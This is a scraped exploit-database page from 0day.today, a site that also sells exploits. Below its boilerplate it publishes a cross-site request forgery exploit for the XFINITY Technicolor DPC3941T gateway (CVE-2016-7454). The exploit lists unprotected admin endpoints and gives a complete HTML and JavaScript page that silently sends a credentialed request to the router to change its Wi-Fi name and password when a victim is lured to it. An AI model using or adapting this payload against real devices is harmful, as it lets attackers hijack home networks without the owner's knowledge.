0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
XFINITY Gateway Technicolor DPC3941T Cross Site Request Forgery Vulnerability
Author
Risk
[
Security Risk Low
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: CSRF XFINITY Gateway product Technicolor(previously Cisco) DPC3941T # Exploit Author: Ayushman Dutta # Version: dpc3941-P20-18-v303r20421733-160413a-CMCST # CVE : CVE-2016-7454 The Device DPC3941T is vulnerable to CSRF and has no security on the entire admin panel for it. Some of the links are at: <IP Address>/actionHandler/ajax_remote_management.php <IP Address>/actionHandler/ajaxSet_wireless_network_configuration_edit.php <IP Address>/actionHandler/ajax_network_diagnostic_tools.php <IP Address>/actionHandler/ajax_at_a_glance.php A simple HTML page with javascript on which the attacker lures the victim can be used to change state in the application. <html> <head> <title> Lets CSRF Xfinity to change Wifi Password </title> </head> <script> function jsonreq() { var json_upload = "configInfo=" + JSON.stringify({"radio_enable":"true", "network_name":"MyName", "wireless_mode":"a,n,ac", "security":"WPAWPA2_PSK_TKIPAES", "channel_automatic":"true", "channel_number":"40", "network_password":"password", "broadcastSSID":"true", "enableWMM":"true", "ssid_number":"1"}); var xmlhttp = new XMLHttpRequest(); xmlhttp.withCredentials = true; xmlhttp.open("POST","http://10.0.0.1/actionHandler/ajaxSet_wireless_network_ configuration_edit.php", true); xmlhttp.setRequestHeader("Content-Type", "application/x-www-form- urlencoded"); xmlhttp.send(json_upload); } jsonreq(); </script> </html> # 0day.today [2024-11-04] #